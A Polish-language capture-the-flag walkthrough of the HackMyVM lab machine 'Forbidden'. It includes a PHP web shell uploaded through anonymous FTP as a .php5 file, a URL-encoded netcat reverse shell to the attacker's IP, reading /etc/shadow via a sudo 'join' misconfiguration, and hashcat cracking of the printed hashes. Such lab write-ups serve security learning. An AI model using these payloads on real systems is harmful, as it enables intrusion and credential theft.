Forbidden - sml

00. Metainfo

Nazwa: Forbidden
Autor: sML
Wypuszczony: 2020-10-09
Ściągnij: HackMyVM
Poziom: Średni
System: Linux
Nauczysz się: Reverse Engineering, sprytu

01. Wstęp

Forbidden dosyć długo leżał u mnie na dysku, zapomniałem o niej. Dopiero wróciłem w roku 2024, ale dzięki temu wyszła jedna ciekawostka (zaplanowana lub nie). Maszynka jest dosyć prosta, mimo że ma status middle, jednak ma dużo króliczych nor i chyba dzięki temu jest bardzo ciekawa, mimo swojego wieku.

02. Co to za maszyna?

Po wstępnym wykryciu ip Netdiscoverem

netdiscover -P -r 172.16.1.0 | grep "PCS Systemtechnik GmbH"
# 172.16.1.161  08:00:27:3c:42:d7   1   60 PCS Systemtechnik GmbH

i skanowaniu Nmapem:

db_nmap -A -p- 172.16.1.161
# host     port proto name state info
# ----     ---- ----- ---- ----- ----
# 172.16.1.161 21  tcp  ftp  open  vsftpd 3.0.3
# 172.16.1.161 80  tcp  http open  nginx 1.14.2

widzimy, że mamy otwarte porty:

 • 21/tcp - FTP
 • 80/tcp - Apache WWW Wchodząc na strone:

01 dostajemy dużo informacji, między innymi, że Marta jest najlepszym adminem na świecie (zobaczymy). Jest zadowolona, że nikt się jej nie włamie, bo PHP wyłączyła (zobaczymy znowu).

03. Co jest w środku?

WWW

Najpierw przeskanujmy ten system programem Forexbuster:

feroxbuster -x txt,php -u http://172.16.1.161
# ___ ___ __  __   __   __     __  ___
# |__ |__ |__) |__) | / `  / \ \_/ | | \ |__
# |  |___ | \ | \ | \__,  \__/ / \ | |__/ |___
# by Ben "epi" Risher 🤓         ver: 2.10.1
# ───────────────────────────┬──────────────────────
# 🎯 Target Url      │ http://172.16.1.161
# 🚀 Threads        │ 50
# 📖 Wordlist       │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
# 👌 Status Codes     │ All Status Codes!
# 💥 Timeout (secs)    │ 7
# 🦡 User-Agent      │ feroxbuster/2.10.1
# 💉 Config File      │ /etc/feroxbuster/ferox-config.toml
# 🔎 Extract Links     │ true
# 💲 Extensions      │ [txt, php]
# 🏁 HTTP methods     │ [GET]
# 🔃 Recursion Depth    │ 4
# ───────────────────────────┴──────────────────────
# 🏁 Press [ENTER] to use the Scan Management Menu™
# ──────────────────────────────────────────────────
# 404   GET    7l    12w   169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
# 200   GET    8l    41w   241c http://172.16.1.161/
# 200   GET    1l    1w    10c http://172.16.1.161/robots.txt
# 200   GET    1l    12w    75c http://172.16.1.161/note.txt
# [####################] - 33s  90000/90000  0s   found:3    errors:0   
# [####################] - 33s  90000/90000  2744/s http://172.16.1.161/     

Znalezione zostały pliki: robots.txt i note.txt. W note.txt jest taka informacja The extra-secured .jpg file contains my password but nobody can obtain it.. To się przyda później.

FTP

Mamy dostęp do FTP-a za pomocą konta anonymous, do tego się okazuję, że możemy też wgrywać tam pliki. Pliki o rozszerzeniu .php można tam wrzucić, ale niestety się nie uruchomią wchodząc przez stronę. Za to nasza najlepsza adminka na świecie chyba zapomniała, że są inne rozszerzenia typu .php5. Wrzućmy tam nasz shell, którego zawartość tak wygląda:

<?php
echo shell_exec($_REQUEST['cmd']);
?>

Na FTP zaś możemy zrobić coś takiego, po prostu wrzucić ten plik.

ftp 172.16.1.161
# Connected to 172.16.1.161.
# 220 (vsFTPd 3.0.3)
# Name (172.16.1.161:szikers): anonymous
# 331 Please specify the password.
Password: 
# 230 Login successful.
# Remote system type is UNIX.
# Using binary mode to transfer files.
ftp> put shell.php5
# 229 Entering Extended Passive Mode (|||23644|)
# 150 Here comes the directory listing.
# drwxrwxrwx  2 0    0      4096 Jan 05 20:53 www
# 226 Directory send OK.
ftp> cd www
# 250 Directory successfully changed.
ftp> put shell.php5

04. Reverse Shell

Odpalamy nasz Reverse Shell:

Nasłuchiwacz

nc -lvp 12345

Kod na stronie

Wklejamy przez przeglądarkę:

172.16.1.161/shell.php5?cmd=php%20-r%20%22system%20%28%27nc%20-c%20%2Fbin%2Fbash%20172.16.1.89%2012345%27%29%3B%22%20

05. Konta użytkowników

www

w katalogu /var/www/html mamy obrazek TOPSECRETIMAGE.jpg. Można go rozpakować, wydobyć z niego hasło, itd… jednak na nic się to nie przyda, bo hasłem do konta marta jest Nazwa obrazka :smiley:

marta

su - marta

Będąc na koncie marta wydajemy komendę sudo -l. Wynikiem zaś jest:

marta@forbidden:~$ sudo -l
# Matching Defaults entries for marta on forbidden:
#  env_reset, mail_badpass,
#  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

# User marta may run the following commands on forbidden:
#  (ALL : ALL) NOPASSWD: /usr/bin/join

Niestety polecenie sudo /usr/bin/join nie daje nam dostępu do konta Roota, jednak umożliwia przeczytanie pliku /etc/shadow. W nim zaś są zawarte hasła.

sudo /usr/bin/join -a2 /dev/null /etc/shadow

root

Poszliśmy na skróty, Nie wiem jak było w 2020 roku, ale teraz Hashcat ze słownika rockyou.txt odszyfrował nam hasło użytkownika peter i dodatkowo root (to była ta ciekawostka). Nie musimy już przechodzić przez konto peter.

PS C:\temp\hashcat> .\hashcat.exe -O -a0 -m1800 .\hashe\forbidden.txt .\dict\rockyou.txt --show
$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:lalu******
$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:bo******

Zostaw komentarz